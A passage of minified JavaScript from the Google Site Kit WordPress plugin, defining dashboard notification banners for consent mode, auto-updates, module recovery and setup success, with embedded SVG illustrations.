DY3IiBmaWxsPSIjRUJFRUYwIi8+CjxwYXRoIGZpbGwtcnVsZT0iZXZlbm9kZCIgY2xpcC1ydWxlPSJldmVub2RkIiBkPSJNMzEyLjgwOCA3Mi41OTExQzMwNy4xNzYgNjkuODQ5OCAzMDIuMzU2IDY1LjcwMjggMjk4LjgwMiA2MC42MDY3SDI3Ni4wMDNDMjczLjc2NCA2MC42MDY3IDI3MS45NDkgNjIuNDIxOCAyNzEuOTQ5IDY0LjY2MVYxMzkuNzU2QzI3MS45NDkgMTQxLjk5NSAyNzMuNzY0IDE0My44MSAyNzYuMDAzIDE0My44MUgzMDguNzUzQzMxMC45OTIgMTQzLjgxIDMxMi44MDggMTQxLjk5NSAzMTIuODA4IDEzOS43NTZWNzIuNTkxMVoiIGZpbGw9IiNFQkVFRjAiLz4KPGNpcmNsZSBjeD0iMzI4Ljc2NSIgY3k9IjM5Ljc0OTkiIHI9IjMxLjM0MiIgZmlsbD0id2hpdGUiLz4KPHBhdGggZD0iTTMyOS4yODQgMjEuNDc3M0MzMjkuMjg0IDIxLjQ3NzMgMzIwLjI5NiAyNS42MTE2IDMxMy4xMDYgMjcuMDQ5NkMzMTMuMTA2IDQ5LjY5ODIgMzI1LjMyOSA1Ny43ODcgMzI5LjI4NCA1Ny43ODdDMzMzLjIzOCA1Ny43ODcgMzQ1LjY0MSA0Ny45MDA3IDM0NC45MjIgMjcuMDQ5NkMzMzcuNTUyIDI1LjQzMTggMzI5LjI4NCAyMS40NzczIDMyOS4yODQgMjEuNDc3M1oiIGZpbGw9IiM4RTY4Q0IiLz4KPHBhdGggZD0iTTMyOS4yODQgMjEuNDc3M0MzMjkuMjg0IDIxLjQ3NzMgMzIwLjI5NiAyNS42MTE2IDMxMy4xMDYgMjcuMDQ5NkMzMTMuMTA2IDQ5LjY5ODIgMzI1LjMyOSA1Ny43ODcgMzI5LjI4NCA1Ny43ODdDMzMzLjIzOCA1Ny43ODcgMzQ1LjY0MSA0Ny45MDA3IDM0NC45MjIgMjcuMDQ5NkMzMzcuNTUyIDI1LjQzMTggMzI5LjI4NCAyMS40NzczIDMyOS4yODQgMjEuNDc3M1oiIGZpbGw9IiNBOTgzRTYiLz4KPHBhdGggZD0iTTMyOS4yODQgMjEuNDc3M0MzMjkuMjg0IDIxLjQ3NzMgMzIwLjI5NiAyNS42MTE2IDMxMy4xMDYgMjcuMDQ5NkMzMTMuMTA2IDQ5LjY5ODIgMzI1LjMyOSA1Ny43ODcgMzI5LjI4NCA1Ny43ODdWMjEuNDc3M1oiIGZpbGw9IiM4RTY4Q0IiLz4KPGNpcmNsZSBjeD0iMzI5LjQ2MyIgY3k9IjM4LjkxMzMiIHI9IjcuNTQ5NTMiIGZpbGw9IiM0NjIwODMiLz4KPGNpcmNsZSBvcGFjaXR5PSIwLjUiIGN4PSIzMjkuMzE2IiBjeT0iMzguOTgzOCIgcj0iOS42MzY3MyIgc3Ryb2tlPSIjNkU0OEFCIiBzdHJva2Utd2lkdGg9IjEuNDc0OTIiLz4KPG1hc2sgaWQ9Im1hc2swXzE1MDVfNDkzMyIgc3R5bGU9Im1hc2stdHlwZTphbHBoYSIgbWFza1VuaXRzPSJ1c2VyU3BhY2VPblVzZSIgeD0iMzIxIiB5PSIzMSIgd2lkdGg9IjE3IiBoZWlnaHQ9IjE2Ij4KPGNpcmNsZSBjeD0iMzI5LjQ2MyIgY3k9IjM4LjkxMzMiIHI9IjcuNTQ5NTMiIGZpbGw9IiNEOUQ5RDkiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzE1MDVfNDkzMykiPgo8Y2lyY2xlIGN4PSIzMjkuNDY0IiBjeT0iMzYuMDM3NSIgcj0iMy4yMzU1MSIgZmlsbD0id2hpdGUiLz4KPGVsbGlwc2UgY3g9IjMyOS40NjMiIGN5PSI0NS43NDQiIHJ4PSI3LjE5MDAzIiByeT0iNS43NTIwMiIgZmlsbD0id2hpdGUiLz4KPC9nPgo8L2c+CjxnIGZpbHRlcj0idXJsKCNmaWx0ZXIxX2RfMTUwNV80OTMzKSI+CjxyZWN0IHg9IjE2Ni44NzIiIHk9Ijg2LjQyNDMiIHdpZHRoPSIxMjUuNDY2IiBoZWlnaHQ9IjQ0LjQzNTkiIHJ4PSI0LjQ5NzEzIiBmaWxsPSIjOEU2OENCIi8+CjxyZWN0IHg9IjIwMC44NTIiIHk9Ijk1LjEzNzIiIHdpZHRoPSI1Ny41MDUzIiBoZWlnaHQ9IjMuNDg1MTciIHJ4PSIxLjc0MjU5IiBmaWxsPSJ3aGl0ZSIvPgo8cmVjdCB4PSIxOTEuMjY4IiB5PSIxMDIuOTc5IiB3aWR0aD0iNzYuNjczNyIgaGVpZ2h0PSIzLjQ4NTE3IiByeD0iMS43NDI1OSIgZmlsbD0id2hpdGUiLz4KPHJlY3QgeD0iMjMxLjM0NyIgeT0iMTEzLjQzNCIgd2lkdGg9IjI3LjAxMDEiIGhlaWdodD0iOS41ODQyMiIgcng9IjQuNzkyMTEiIGZpbGw9IndoaXRlIi8+CjxyZWN0IHg9IjIwMS41ODkiIHk9IjExNC4xNzIiIHdpZHRoPSIyNS41MzUyIiBoZWlnaHQ9IjguMTA5MyIgcng9IjQuMDU0NjUiIHN0cm9rZT0id2hpdGUiIHN0cm9rZS13aWR0aD0iMS40NzQ5MiIvPgo8L2c+CjwvZz4KPC9nPgo8ZGVmcz4KPGZpbHRlciBpZD0iZmlsdGVyMF9kXzE1MDVfNDkzMyIgeD0iMTI0LjIwMSIgeT0iLTAuNDQxNTM1IiB3aWR0aD0iMjQ3LjcwNSIgaGVpZ2h0PSIxNzcuNjE0IiBmaWx0ZXJVbml0cz0idXNlclNwYWNlT25Vc2UiIGNvbG9yLWludGVycG9sYXRpb24tZmlsdGVycz0ic1JHQiI+CjxmZUZsb29kIGZsb29kLW9wYWNpdHk9IjAiIHJlc3VsdD0iQmFja2dyb3VuZEltYWdlRml4Ii8+CjxmZUNvbG9yTWF0cml4IGluPSJTb3VyY2VBbHBoYSIgdHlwZT0ibWF0cml4IiB2YWx1ZXM9IjAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDEyNyAwIiByZXN1bHQ9ImhhcmRBbHBoYSIvPgo8ZmVPZmZzZXQgZHk9IjIuOTQ5ODMiLz4KPGZlR2F1c3NpYW5CbHVyIHN0ZERldmlhdGlvbj0iNS44OTk2NiIvPgo8ZmVDb21wb3NpdGUgaW4yPSJoYXJkQWxwaGEiIG9wZXJhdG9yPSJvdXQiLz4KPGZlQ29sb3JNYXRyaXggdHlwZT0ibWF0cml4IiB2YWx1ZXM9IjAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAuMTUgMCIvPgo8ZmVCbGVuZCBtb2RlPSJub3JtYWwiIGluMj0iQmFja2dyb3VuZEltYWdlRml4IiByZXN1bHQ9ImVmZmVjdDFfZHJvcFNoYWRvd18xNTA1XzQ5MzMiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMTUwNV80OTMzIiByZXN1bHQ9InNoYXBlIi8+CjwvZmlsdGVyPgo8ZmlsdGVyIGlkPSJmaWx0ZXIxX2RfMTUwNV80OTMzIiB4PSIxNTUuMDcyIiB5PSI4MC41MjQ3IiB3aWR0aD0iMTQ5LjA2NSIgaGVpZ2h0PSI2OC4wMzQ3IiBmaWx0ZXJVbml0cz0idXNlclNwYWNlT25Vc2UiIGNvbG9yLWludGVycG9sYXRpb24tZmlsdGVycz0ic1JHQiI+CjxmZUZsb29kIGZsb29kLW9wYWNpdHk9IjAiIHJlc3VsdD0iQmFja2dyb3VuZEltYWdlRml4Ii8+CjxmZUNvbG9yTWF0cml4IGluPSJTb3VyY2VBbHBoYSIgdHlwZT0ibWF0cml4IiB2YWx1ZXM9IjAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDEyNyAwIiByZXN1bHQ9ImhhcmRBbHBoYSIvPgo8ZmVPZmZzZXQgZHk9IjUuODk5NjYiLz4KPGZlR2F1c3NpYW5CbHVyIHN0ZERldmlhdGlvbj0iNS44OTk2NiIvPgo8ZmVDb21wb3NpdGUgaW4yPSJoYXJkQWxwaGEiIG9wZXJhdG9yPSJvdXQiLz4KPGZlQ29sb3JNYXRyaXggdHlwZT0ibWF0cml4IiB2YWx1ZXM9IjAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAuMjUgMCIvPgo8ZmVCbGVuZCBtb2RlPSJub3JtYWwiIGluMj0iQmFja2dyb3VuZEltYWdlRml4IiByZXN1bHQ9ImVmZmVjdDFfZHJvcFNoYWRvd18xNTA1XzQ5MzMiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMTUwNV80OTMzIiByZXN1bHQ9InNoYXBlIi8+CjwvZmlsdGVyPgo8Y2xpcFBhdGggaWQ9ImNsaXAwXzE1MDVfNDkzMyI+CjxyZWN0IHdpZHRoPSI0NTciIGhlaWdodD0iMTQ2IiBmaWxsPSJ3aGl0ZSIvPgo8L2NsaXBQYXRoPgo8Y2xpcFBhdGggaWQ9ImNsaXAxXzE1MDVfNDkzMyI+CjxyZWN0IHdpZHRoPSI1NTMiIGhlaWdodD0iMTU4IiBmaWxsPSJ3aGl0ZSIgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoLTQ4KSIvPgo8L2NsaXBQYXRoPgo8L2RlZnM+Cjwvc3ZnPgo=",verticalPosition:"center"},learnMoreLink:{href:c},errorText:t?.message,gaTrackingEventArgs:I})})}ConsentModeSetupCTABanner.propTypes={id:Ne().string,Notification:Ne().elementType};var xe=t(73198);const Ee="auto-update-cta";function EnableAutoUpdateBannerNotification({id:e,Notification:i}){const t=(0,De.A)(),n=(0,o.useSelect)(e=>e(Y.O4).getSiteKitAutoUpdatesEnabled()),s=(0,o.useSelect)(e=>e(Y.O4).getErrorForAction("enableAutoUpdate",[])),{enableAutoUpdate:a}=(0,o.useDispatch)(Y.O4),r=(0,ie.useCallback)(async()=>{await a()},[a]),[I,l]=(0,ie.useState)(!1);if((0,ie.useEffect)(()=>{!1===I&&!0===n&&l(!0)},[I,l,n]),s?.message)return(0,q.jsx)(xe.A,{message:s.message});if(I){const o={category:`${t}_${Ee}-success`};return(0,q.jsx)(i,{children:(0,q.jsx)(de.A,{notificationID:e,type:ce.Q.SUCCESS,gaTrackingEventArgs:o,title:(0,K.__)("Thanks for enabling auto-updates","google-site-kit"),description:(0,K.__)("Auto-updates have been enabled. Your version of Site Kit will automatically be updated when new versions are available.","google-site-kit"),dismissButton:{label:(0,K.__)("Dismiss","google-site-kit"),dismissOptions:{expiresInSeconds:1}}})})}return(0,q.jsx)(i,{children:(0,q.jsx)(de.A,{notificationID:e,type:ce.Q.NEW,title:(0,K.__)("Keep Site Kit up-to-date","google-site-kit"),description:(0,K.__)("Turn on auto-updates so you always have the latest version of Site Kit. We constantly introduce new features to help you get the insights you need to be successful on the web.","google-site-kit"),ctaButton:{label:(0,K.__)("Enable auto-updates","google-site-kit"),onClick:r},dismissButton:{label:(0,K.__)("Dismiss","google-site-kit")}})})}EnableAutoUpdateBannerNotification.propTypes={id:Ne().string.isRequired,Notification:Ne().elementType.isRequired};var he=t(4452),ke=t.n(he),fe=t(99408),we=t(83880),Ce=t(41671);function Description({recoverableModules:e,userRecoverableModuleSlugs:i,hasUserRecoverableModules:t,hasMultipleRecoverableModules:n}){const s=(0,o.useSelect)(e=>e(Y.O4).getDocumentationLinkURL("dashboard-sharing"));let a;return!n&&t?a=(0,K.sprintf)(/* translators: %s: module name. */ /* translators: %s: module name. */ (0,K.__)("%s data was previously shared with other users on the site by another admin who no longer has access. To restore access, you may recover the module as the new owner.","google-site-kit"),e[i[0]]?.name):n&&t?a=(0,K.__)("The data for the following modules was previously shared with other users on the site by another admin who no longer has access. To restore access, you may recover the module as the new owner.","google-site-kit"):n||t||!e?n&&!t&&(a=(0,K.__)("The data for the following modules was previously shared with other users on the site by another admin who no longer has access. To restore access, the module must be recovered by another admin who has access.","google-site-kit")):a=(0,K.sprintf)(/* translators: %s: module name. */ /* translators: %s: module name. */ (0,K.__)("%s data was previously shared with other users on the site by another admin who no longer has access. To restore access, the module must be recovered by another admin who has access.","google-site-kit"),Object.values(e)[0]?.name),a?(0,q.jsxs)(we.A,{children:[a," ",(0,q.jsx)(Ce.A,{label:(0,K.__)("Learn more","google-site-kit"),href:s})]}):null}var Le=t(49383);function Errors({recoveryErrors:e}){return(0,q.jsxs)("div",{className:"googlesitekit-module-recovery-errors",children:[1===Object.keys(e).length&&(0,q.jsx)(we.A,{children:(0,K.sprintf)(/* translators: %s: Error message */ /* translators: %s: Error message */ (0,K.__)("Error: %s","google-site-kit"),Object.values(e)[0].message)}),Object.keys(e).length>1&&(0,q.jsxs)(ie.Fragment,{children:[(0,q.jsx)(we.A,{children:(0,K.__)("The following modules failed to be recovered:","google-site-kit")}),(0,q.jsx)("ul",{children:Object.keys(e).map(i=>(0,q.jsx)("li",{children:(0,K.sprintf)(/* translators: 1: Module name, 2: Error message */ /* translators: 1: Module name, 2: Error message */ (0,K.__)("%1$s: %2$s","google-site-kit"),e[i].name,e[i].message)},i))})]})]})}function AdditionalDescription({inProgress:e,selectedModuleSlugs:i,hasUserRecoverableModules:t,recoverableModules:n,userRecoverableModuleSlugs:s,hasMultipleRecoverableModules:a,setSelectedModuleSlugs:r}){const I=(0,o.useSelect)(e=>e(B.i).getRecoveryErrors());return t||a?t?(0,q.jsxs)(ie.Fragment,{children:[a&&(0,q.jsxs)(ie.Fragment,{children:[i&&s.map(t=>(0,q.jsx)("div",{children:(0,q.jsx)(Le.Checkbox,{checked:i.includes(t),name:"module-recovery-alert-checkbox",id:`module-recovery-alert-checkbox-${t}`,onChange:()=>{i.includes(t)?r((0,ne.without)(i,t)):r([...i,t])},disabled:e,value:t,children:n[t].name})},t)),(0,q.jsx)(we.A,{children:(0,K.__)("By recovering the selected modules, you will restore access for other users by sharing access via your Google account. This does not make any changes to external services and can be managed at any time via the dashboard sharing settings.","google-site-kit")})]}),!a&&(0,q.jsx)(we.A,{children:(0,K.__)("By recovering the module, you will restore access for other users by sharing access via your Google account. This does not make any changes to external services and can be managed at any time via the dashboard sharing settings.","google-site-kit")}),Object.keys(I).length>0&&(0,q.jsx)(Errors,{recoveryErrors:I})]}):(0,q.jsx)("ul",{className:"mdc-list mdc-list--non-interactive",children:Object.values(n||{}).map(e=>(0,q.jsx)("li",{className:"mdc-list-item",children:(0,q.jsx)("span",{className:"mdc-list-item__text",children:e.name})},e.slug))}):null}Errors.propTypes={recoveryErrors:Ne().object.isRequired};var Oe=t(4751);var be=t(37467);function SiteKitSetupSuccessNotification({id:e,Notification:i}){const t=(0,o.useSelect)(e=>e(Y.O4).getConnectMoreServicesURL()),[,n]=(0,be.A)("notification"),s=(0,ie.useCallback)(()=>{n(void 0)},[n]);return(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,title:(0,K.__)("Congrats on completing the setup for Site Kit!","google-site-kit"),description:(0,K.__)("Connect more services or edit connected services from the settings screen.","google-site-kit"),learnMoreLink:{href:t,label:(0,K.__)("Go to Settings","google-site-kit"),external:!1},dismissButton:{label:(0,K.__)("Got it!","google-site-kit"),onClick:s,tertiary:!1},svg:{desktop:"data:image/svg+xml;base64,<svg width="380" height="144" viewBox="0 0 380 144" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M335.878 79.0336C357.308 119.118 349.94 177.093 304.85 198.473C259.759 219.854 223.573 183.297 202.554 184.519C181.534 185.74 178.945 206.648 154.742 221.62C130.54 236.593 61.8707 231.313 22.5309 200.078C-16.8089 168.843 2.12934 95.9274 36.8754 78.7403C71.6215 61.5532 82.057 80.3668 117.126 66.1815C152.195 51.9962 144.408 26.5354 176.054 10.8946C246.681 -24.0128 314.448 38.9488 335.878 79.0336Z" fill="#D0FBE1"/>
<g filter="url(#filter0_d_1843_53306)">
<rect x="81.207" y="16.8124" width="171.958" height="172.674" rx="9.38045" fill="#EBEEF0"/>
<mask id="mask0_1843_53306" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="81" y="16" width="173" height="176">
<rect x="81.207" y="16.8124" width="171.958" height="174.824" rx="9.38045" fill="#DEE3E6"/>
</mask>
<g mask="url(#mask0_1843_53306)">
<rect x="91.9531" y="76.9977" width="70.216" height="95.2932" rx="5.03954" fill="white"/>
<rect x="100.672" y="116.233" width="24.2886" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<rect x="100.672" y="109.383" width="8.71898" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<rect x="100.672" y="131.839" width="8.71898" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<path d="M139.906 115.299C139.906 113.063 141.719 111.251 143.954 111.251H150.182C152.418 111.251 154.23 113.063 154.23 115.299C154.23 117.535 152.418 119.347 150.182 119.347H143.954C141.719 119.347 139.906 117.535 139.906 115.299Z" fill="#B8E6CA"/>
<rect x="100.656" y="86.6187" width="16.4931" height="4.12326" rx="2.06163" fill="#EBEEF0"/>
<path d="M139.906 137.755C139.906 135.519 141.719 133.707 143.954 133.707H150.182C152.418 133.707 154.23 135.519 154.23 137.755C154.23 139.991 152.418 141.803 150.182 141.803H143.954C141.719 141.803 139.906 139.991 139.906 137.755Z" fill="#FFDED3"/>
<rect x="100.051" y="138.689" width="25.5342" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<path d="M162.047 99.2175L92.4095 99.2175" stroke="#EBEEF0" stroke-width="0.916281"/>
<rect x="170.766" y="76.9977" width="70.216" height="95.2932" rx="5.03954" fill="white"/>
<rect x="179.91" y="116.233" width="24.2339" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<rect x="179.91" y="109.383" width="8.69933" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<rect x="179.91" y="131.839" width="8.69933" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<path d="M219.055 115.299C219.055 113.063 220.867 111.251 223.103 111.251H229.298C231.534 111.251 233.346 113.063 233.346 115.299C233.346 117.535 231.534 119.347 229.298 119.347H223.103C220.867 119.347 219.055 117.535 219.055 115.299Z" fill="#B8E6CA"/>
<rect x="179.93" y="86.6187" width="16.5214" height="4.12326" rx="2.06163" fill="#EBEEF0"/>
<path d="M240.98 99.2175L170.764 99.2175" stroke="#EBEEF0" stroke-width="0.916281"/>
<path d="M219.055 137.755C219.055 135.519 220.867 133.707 223.103 133.707H229.298C231.534 133.707 233.346 135.519 233.346 137.755C233.346 139.991 231.534 141.803 229.298 141.803H223.103C220.867 141.803 219.055 139.991 219.055 137.755Z" fill="#FFDED3"/>
<rect x="179.289" y="138.689" width="25.4766" height="4.35949" rx="2.17975" fill="#EBEEF0"/>
<rect width="46.6602" height="25.4531" rx="3.11094" transform="matrix(1 0 0 -1 194.324 66.7487)" fill="white"/>
<rect width="7.07032" height="2.2625" rx="1.13125" transform="matrix(1 0 0 -1 198.848 62.2237)" fill="#EBEEF0"/>
<rect width="14.1395" height="5.65625" rx="2.82813" transform="matrix(1 0 0 -1 198.848 57.4159)" fill="#FFDED3"/>
<rect width="37.611" height="2.2625" rx="1.13125" transform="matrix(1 0 0 -1 198.848 47.5175)" fill="#EBEEF0"/>
<path d="M201.392 55.4362L203.257 53.5715M203.257 53.5715L203.277 55.0426M203.257 53.5715L201.786 53.5508" stroke="white" stroke-width="0.424219" stroke-linecap="round" stroke-linejoin="round"/>
<rect width="5.65625" height="1.69688" rx="0.565625" transform="matrix(1 0 0 -1 205.07 55.4362)" fill="white"/>
<rect width="46.6602" height="25.4531" rx="3.11094" transform="matrix(1 0 0 -1 143.137 66.7487)" fill="white"/>
<rect width="29.6929" height="2.2625" rx="1.13125" transform="matrix(1 0 0 -1 147.66 62.2237)" fill="#EBEEF0"/>
<rect width="14.1395" height="5.65625" rx="2.82813" transform="matrix(1 0 0 -1 147.66 57.4159)" fill="#B8E6CA"/>
<rect width="37.611" height="2.2625" rx="1.13125" transform="matrix(1 0 0 -1 147.66 47.5175)" fill="#EBEEF0"/>
<path d="M150.207 53.5508L152.072 55.4155M152.072 55.4155L150.601 55.4362M152.072 55.4155L152.092 53.9445" stroke="white" stroke-width="0.424219" stroke-linecap="round" stroke-linejoin="round"/>
<rect width="5.65625" height="1.69688" rx="0.565625" transform="matrix(1 0 0 -1 153.883 55.4362)" fill="white"/>
<rect width="46.6602" height="25.4531" rx="3.11094" transform="matrix(1 0 0 -1 91.9531 66.7487)" fill="white"/>
<rect width="18.0985" height="2.2625" rx="1.13125" transform="matrix(1 0 0 -1 96.4766 62.2237)" fill="#EBEEF0"/>
<path d="M96.4766 54.5878C96.4766 56.1497 97.7428 57.4159 99.3047 57.4159H107.788C109.35 57.4159 110.616 56.1497 110.616 54.5878C110.616 53.0258 109.35 51.7596 107.788 51.7596H99.3047C97.7428 51.7596 96.4766 53.0258 96.4766 54.5878Z" fill="#B8E6CA"/>
<rect width="37.611" height="2.2625" rx="1.13125" transform="matrix(1 0 0 -1 96.4766 47.5175)" fill="#EBEEF0"/>
<path d="M99.0234 53.5508L100.888 55.4155M100.888 55.4155L99.4171 55.4362M100.888 55.4155L100.909 53.9445" stroke="white" stroke-width="0.424219" stroke-linecap="round" stroke-linejoin="round"/>
<rect width="5.65625" height="1.69688" rx="0.565625" transform="matrix(1 0 0 -1 102.699 55.4362)" fill="white"/>
</g>
<path d="M81.207 26.2378C81.207 21.0571 85.4068 16.8573 90.5875 16.8573H243.572C248.752 16.8573 252.952 21.0571 252.952 26.2378V31.0707H81.207V26.2378Z" fill="white"/>
<rect x="88.3125" y="21.5949" width="4.73779" height="4.73779" rx="2.3689" fill="#F3F5F7"/>
<rect x="95.4219" y="21.5949" width="4.73779" height="4.73779" rx="2.3689" fill="#F3F5F7"/>
<rect x="102.586" y="21.5949" width="4.73779" height="4.73779" rx="2.3689" fill="#F3F5F7"/>
</g>
<path d="M315.175 99.836C310.71 95.0744 309.52 77.8135 309.52 77.8135C309.52 77.8135 308.627 95.0744 304.163 99.836C299.699 104.598 286.902 105.49 286.902 105.49C286.902 105.49 301.187 107.276 304.461 112.335C307.734 117.395 309.52 133.465 309.52 133.465C309.52 133.465 310.71 115.906 315.175 111.442C319.639 106.978 332.435 105.49 332.435 105.49C332.435 105.49 319.639 104.598 315.175 99.836Z" fill="#FFFAEF"/>
<path d="M284.044 129.574C281.394 126.748 280.687 116.502 280.687 116.502C280.687 116.502 280.157 126.748 277.507 129.574C274.858 132.4 267.262 132.93 267.262 132.93C267.262 132.93 275.741 133.99 277.684 136.993C279.627 139.996 280.687 149.536 280.687 149.536C280.687 149.536 281.394 139.113 284.044 136.463C286.693 133.814 294.289 132.93 294.289 132.93C294.289 132.93 286.693 132.4 284.044 129.574Z" fill="#FFFAEF"/>
<path d="M297.137 67.6732C294.488 64.8468 293.781 54.601 293.781 54.601C293.781 54.601 293.251 64.8468 290.601 67.6732C287.951 70.4996 280.355 71.0296 280.355 71.0296C280.355 71.0296 288.835 72.0895 290.778 75.0926C292.721 78.0956 293.781 87.6348 293.781 87.6348C293.781 87.6348 294.488 77.2124 297.137 74.5626C299.787 71.9128 307.383 71.0296 307.383 71.0296C307.383 71.0296 299.787 70.4996 297.137 67.6732Z" fill="#FFFAEF"/>
<defs>
<filter id="filter0_d_1843_53306" x="69.7432" y="8.21456" width="194.885" height="195.602" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.86596"/>
<feGaussianBlur stdDeviation="5.73192"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1843_53306"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1843_53306" result="shape"/>
</filter>
</defs>
</svg>
",verticalPosition:"bottom"}})})}function ModuleSetupSuccessNotification({id:e,Notification:i}){const[,t]=(0,be.A)("notification"),[n,s]=(0,be.A)("slug"),a=(0,o.useSelect)(e=>e(B.i).getModule(n)),r=(0,o.useSelect)(e=>e(Y.O4).getConnectMoreServicesURL());const I={category:`${(0,De.A)()}_setup-success-notification-${a?.slug}`};return(0,q.jsx)(i,{gaTrackingEventArgs:I,children:(0,q.jsx)(de.A,{notificationID:e,type:ce.Q.SUCCESS,gaTrackingEventArgs:I,title:(0,K.sprintf)(/* translators: %s: module name */ /* translators: %s: module name */ (0,K.__)("Congrats on completing the setup for %s!","google-site-kit"),a?.name),description:(0,K.__)("Connect more services to see more stats.","google-site-kit"),dismissButton:{onClick:function(){t(void 0),s(void 0)}},ctaButton:{label:(0,K.__)("Go to Settings","google-site-kit"),href:r}})})}SiteKitSetupSuccessNotification.propTypes={id:Ne().string.isRequired,Notification:Ne().elementType},ModuleSetupSuccessNotification.propTypes={id:Ne().string.isRequired,Notification:Ne().elementType.isRequired};var Ze,ve,Re=t(81276),Ue=t(7972),Pe=t(76729),Ge=t(33903);function Qe(){return Qe=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var t=arguments[i];for(var o in t)({}).hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},Qe.apply(null,arguments)}const Ye=e=>ie.createElement("svg",Qe({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 348 163"},e),Ze||(Ze=ie.createElement("g",{clipPath:"url(#email-reporting-overlay-desktop_svg__a)"},ie.createElement("path",{fill:"#B8E6CA",d:"M0 16C0 7.163 7.163 0 16 0h316c8.837 0 16 7.163 16 16v147H0z"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-desktop_svg__b)"},ie.createElement("path",{fill:"#EBEEF0",d:"M75.352 82.774a8.32 8.32 0 0 1 4.337-7.307l87.93-47.985a13.32 13.32 0 0 1 12.761 0l87.931 47.985a8.32 8.32 0 0 1 4.337 7.307v94.401a8.325 8.325 0 0 1-8.325 8.325H83.676a8.325 8.325 0 0 1-8.324-8.325z"})),ie.createElement("g",{filter:"url(#email-reporting-overlay-desktop_svg__c)"},ie.createElement("rect",{width:88,height:57,x:66.467,y:-1.393,fill:"#fff",rx:9.075,transform:"rotate(-38.65 66.467 -1.393)"})),ie.createElement("rect",{width:61,height:6.763,x:84.463,y:.297,fill:"#EBEEF0",rx:3.3,transform:"rotate(-38.65 84.463 .297)"}),ie.createElement("rect",{width:41.249,height:15.94,x:93.201,y:10.905,fill:"#B8E6CA",rx:7.97,transform:"rotate(-38.65 93.201 10.905)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.237,d:"m105.805 14.774.966-7.501m0 0-3.388 2.634m3.388-2.634 2.636 3.2"}),ie.createElement("rect",{width:16.5,height:4.782,x:110.861,y:3.926,fill:"#fff",rx:1.65,transform:"rotate(-38.65 110.861 3.926)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-desktop_svg__d)"},ie.createElement("rect",{width:87,height:57,x:171.227,y:1.983,fill:"#fff",rx:9.075,transform:"rotate(5.072 171.227 1.983)"})),ie.createElement("rect",{width:52,height:7,x:183.025,y:16.081,fill:"#EBEEF0",rx:3.3,transform:"rotate(5.072 183.025 16.081)"}),ie.createElement("rect",{width:41.249,height:16.5,x:181.969,y:30.268,fill:"#FFDED3",rx:8.25,transform:"rotate(5.072 181.969 30.268)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.237,d:"m188.852 36.676 4.937 5.9m0 0 .44-4.27m-.44 4.27-4.28-.32"}),ie.createElement("rect",{width:16.5,height:4.95,x:199.535,y:37.625,fill:"#fff",rx:1.65,transform:"rotate(5.072 199.535 37.625)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-desktop_svg__e)"},ie.createElement("rect",{width:87,height:57,x:168.918,y:77.078,fill:"#fff",rx:9.075,transform:"rotate(21.428 168.918 77.078)"})),ie.createElement("rect",{width:20.625,height:6.6,x:176.383,y:94.187,fill:"#EBEEF0",rx:3.3,transform:"rotate(21.428 176.383 94.187)"}),ie.createElement("rect",{width:41.249,height:16.5,x:171.26,y:107.243,fill:"#FFDED3",rx:8.25,transform:"rotate(21.428 171.26 107.243)"}),ie.createElement("path",{stroke:"#fff",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:1.237,d:"m176.06 115.331 3.076 7.05m0 0 1.624-3.972m-1.624 3.972-4.016-1.511"}),ie.createElement("rect",{width:16.5,height:4.95,x:186.045,y:119.249,fill:"#fff",rx:1.65,transform:"rotate(21.428 186.045 119.249)"}),ie.createElement("g",{filter:"url(#email-reporting-overlay-desktop_svg__f)"},ie.createElement("rect",{width:88,height:57,x:101.674,y:57.565,fill:"#fff",rx:9.075,transform:"rotate(-9.325 101.674 57.565)"})),ie.createElement("rect",{width:41,height:7,x:116.609,y:68.287,fill:"#EBEEF0",rx:3.3,transform:"rotate(-9.325 116.609 68.287)"}),ie.createElement("rect",{width:41.249,height:16.5,x:119.109,y:82.291,fill:"#B8E6CA",rx:8.25,transform:"rotate(-9.325 119.109 